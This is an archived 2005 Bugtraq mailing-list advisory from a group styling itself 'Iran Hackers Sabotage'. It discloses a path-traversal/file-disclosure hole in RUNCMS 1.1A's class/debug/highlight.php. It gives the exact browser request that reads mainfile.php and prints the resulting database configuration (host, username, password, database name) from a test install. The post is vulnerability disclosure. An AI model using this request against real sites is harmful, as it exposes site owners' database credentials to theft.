[<prev] [next>] [day] [month] [year] [list]
Message-ID: <E1DCJCd-000FiC-VO@hossein.emami.bistgani>
Date: Fri, 18 Mar 2005 10:15:55 -0500
From: "Majid NT" <NT@...team.com>
To: bugtraq@...urityfocus.com
Subject: runcms highlight.php hole
********************************************
IHS Iran Hackers Sabotage Public advisory
by : NT NT@...team.com
********************************************
If You Have RUNCMS Installation Address You Can Use highligh.php Hole
And Get DataBase Configuration(Name,User,Password)
Tested In RUNCMS 1.1A
-------------------------------------------
Input This Line To Your Browser AddressBar :
http://targetsite/runcmsinstalation/class/debug/highlight.php?
file=runcmsinstallationpath\mainfile.php&line=151#151
Like This :
http://localhost/runcms/class/debug/highlight.php?
file=c:\phpdev\www\runcms\mainfile.php&line=151#151
You See This Result :
1 <?php
2 // -------------------------------------------------------------------
------ //
3 // E-Xoops: Content Management for the
Masses //
4 // < http://www.e-xoops.com
> //
5 // -------------------------------------------------------------------
------ //
6
7 if ( !defined('XOOPS_MAINFILE_INCLUDED') ) {
8 define('XOOPS_MAINFILE_INCLUDED', 1);
9
10 // Physical Path
11 // Physical path to your main RUNCMS directory WITHOUT trailing
slash. ( On windows use simple forward slashes & be sure to include the
drive letter. c:/myfolder )
12 define('XOOPS_ROOT_PATH', 'c:/phpdev/www/runcms1.1');
13
14 // Virtual Path (URL)
15 // Virtual path to your main RUNCMS directory WITHOUT trailing
slash. ( http://www.mysite.com/myfolder )
16 define('XOOPS_URL', 'http://localhost/runcms1.1');
17
18 // Database
19 // Choose the type of database to be used.
20 $xoopsConfig['database'] = 'mysql';
21
22 // Table Prefix
23 // This prefix will be added to all new tables created to avoid
name conflict in the database. If you are unsure, just use the
default 'runcms'.
24 $xoopsConfig['prefix'] = 'runcms';
25
26 // Database Hostname
27 // Hostname of the database server. ( If you are
unsure, 'localhost' works in most cases. )
28 $xoopsConfig['dbhost'] = 'localhost';
29
30 // Database Username
31 // Your database user account on the host. ( Often root when
installed on your local machine. )
32 $xoopsConfig['dbuname'] = 'root';
33
34 // Database Password
35 // Password for your database user account.
36 $xoopsConfig['dbpass'] = '';
37
38 // Database Name
39 // The name of database on the host. The installer will attempt
to create the database if not exist.
40 $xoopsConfig['dbname'] = 'aaa';
41
42 // Use persistent connection? (Yes=1 No=0)
43 // Default is 'No'. Choose 'No' if you are unsure.
44 $xoopsConfig['db_pconnect'] = 0;
45
46 // Default setup language.
47 $xoopsConfig['default_language'] = 'english';
48
49 include_once(XOOPS_ROOT_PATH.'/include/common.php');
50 }
?>
------------------------------------------
More Information See:
http://www.ihsteam.com/cms/modules/mydownloads/visit.php?lid=12
Source Advisory :
http://www.ihsteam.com/cms/modules/mydownloads/visit.php?lid=14
Found By NT(IHS)
NT@...Team.com
Greet To Lord And C0d3r From IHS.
www.IHSTeam.com
--
www.IHSTEAM.com
www.IHSSECURITY.com
Powered by blists - more mailing lists